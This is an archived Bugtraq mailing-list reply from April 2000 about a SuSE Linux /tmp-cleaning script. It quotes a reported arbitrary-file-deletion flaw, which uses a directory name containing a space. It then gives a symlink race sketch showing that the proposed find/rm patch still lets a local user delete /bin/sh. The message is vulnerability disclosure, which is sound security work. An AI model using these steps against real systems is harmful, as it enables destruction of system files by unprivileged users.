linux, säkerhet

5034423 2000-04-24  22:35  /44 rader/ Postmaster
Mottagare: Bugtraq (import) <10601>
Ärende: Re: local user can delete arbitrary files on SuSE-Linux
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-2
Message-ID:  <20000422234802.354.0@bobanek.nowhere.cz>
Date:         Sun, 23 Apr 2000 00:03:04 +0200
Reply-To: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.21.0004210843510.23186-100000@gmv.spm.univ-rennes1.fr>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by samantha.lysator.liu.se id WAA26175

On Fri, 21 Apr 2000, [ISO-8859-1] Peter Münster wrote:

> If MAX_DAYS_IN_TMP > 0 in /etc/rc.config on a SuSE-Linux system, a local
> user can delete arbitrary files by doing some commands like these:
> mkdir -p "/tmp/hhh /somedirectory"
> touch -t some-early-date "/tmp/hhh /somedirectory/somefile"
> sleep 1d
...
> Here a possible patch for suse-package aaa_base-2000.1.3-0:
...
> +		find $TMP_DIR/. $OMIT ! -type d \
> +			-atime +$MAX_DAYS_IN_TMP -exec rm -f '{}' ';'
> +		find $TMP_DIR/. $OMIT -depth -type d -empty -mindepth 1 \
> +			-mtime +$MAX_DAYS_IN_TMP -exec rmdir '{}' ';'

mkdir -p /tmp/somedirectory/{_junk,bin}
fill_with_lots_of_junk_to_slow_find_down /tmp/somedirectory/_junk
find /tmp/somedirectory -type f | xargs touch -t some-early-date
touch -t some-early-date /tmp/somedirectory/bin/sh
wait_until_aaa_base_starts_searching /tmp/somedirectory/_junk
mv /tmp/somedirectory /tmp/somedirectory2
ln -s / /tmp/somedirectory

watch /bin/sh disappear...this will teach you not to use find and
rm to clean /tmp :)

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
(5034423) ------------------------------------------